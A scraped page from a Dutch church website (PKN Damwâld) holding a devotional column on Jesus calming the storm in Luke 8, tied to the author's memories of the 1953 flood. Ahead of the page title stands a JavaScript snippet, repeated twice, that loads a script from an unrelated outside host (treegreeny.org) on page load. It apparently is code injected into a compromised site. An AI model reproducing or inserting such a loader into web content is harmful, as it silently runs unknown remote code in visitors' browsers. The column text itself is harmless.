;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wie is Hij toch ? - PKN Damwâld

Wie is Hij toch ?

Gepubliceerd op: zaterdag 25 juni 2022

Meerdere mensen hebben een (of meerdere) favoriete Bijbeltekst(en) of Bijbelgedeelte(s). Bij de een is dat een bepaalde psalm, bij een ander een van de spreuken van Salomo of een woord van Jezus. Ook vinden veel mensen een favoriete Bijbelpassage in één van de brieven in het Nieuwe Testament. Bij veel getrouwde mensen is het favoriete Bijbelgedeelte hun trouwtekst. Ook hebben veel van hen die belijdenis van hun geloof hebben afgelegd de tekst die hen toen is meegegeven in hun hart gesloten. Door de jaren heen zijn ze als het ware vergroeid met de betreffende woorden.
Mensen hebben in hun leven verschillende ervaringen en heel vaak is een bepaalde ervaring een basis van de voorkeur voor een bepaald Bijbel gedeelte. Een van mijn favoriete Bijbelgedeeltes is het verhaal dat bekend staat als ‘de storm op het meer’ (Lukas 8 : 22 en volgende). Misschien komt het wel doordat ik geboren ben in een dorp vlak bij de Waddenzee en een van mijn eerste herinneringen is de stormramp in 1953 in Zeeland/Zuid-Holland. Ook onze ouders waren toen bang voor het geweld van de storm en de zee en als klein jongetje merk je zeker iets van die angst. Nog steeds hebben wind en golven iets angstaanjagends in zich voor mij. En dan lees je in Lukas 8 dat Jezus de storm en de golven gebiedt te zwijgen: Zwijg, wees stil ! En wat gebeurt er: De wind en de golven gehoorzaamden Hem !
Als ik terugdenk aan mijn vroegste herinneringen denk ik ook vaak: Was Jezus er toen maar bij geweest in Zeeland/Zuid-Holland en bij ons, dan had Hij tegen wind en de golven hetzelfde kunnen zeggen als toen op het meer: Zwijg, weest stil.
De discipelen van Jezus stellen dan zichzelf en elkaar de vraag: Wie is Hij toch dat zelfs de wind en de golven Hem gehoorzaam zijn. Zij staan verbaasd over de macht van Jezus. Wie is Hij toch.
Dat brengt ons ook bij de volgende vraag: Wie is Hij voor jou, voor mij ?

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns